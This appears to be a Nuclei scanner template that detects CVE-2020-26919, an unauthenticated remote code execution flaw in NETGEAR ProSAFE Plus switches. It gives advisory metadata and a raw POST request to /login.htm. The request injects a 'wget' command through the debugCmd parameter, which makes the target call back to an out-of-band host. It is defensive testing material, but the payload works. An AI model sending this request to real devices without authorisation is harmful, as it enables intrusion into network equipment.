id: CVE-2020-26919

info:
  name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: NETGEAR ProSAFE Plus  before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.
  reference:
    - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
    - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26919
    - https://kb.netgear.com/000062334/Security-Advisory-for-Missing-Function-Level-Access-Control-on-JGS516PE-PSV-2020-0377
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26919
  tags: cve,cve2020,netgear,rce,oast,router,unauth,kev

requests:
  - raw:
      - |
        POST /login.htm HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

        submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"

# Enhanced by mp on 2022/03/27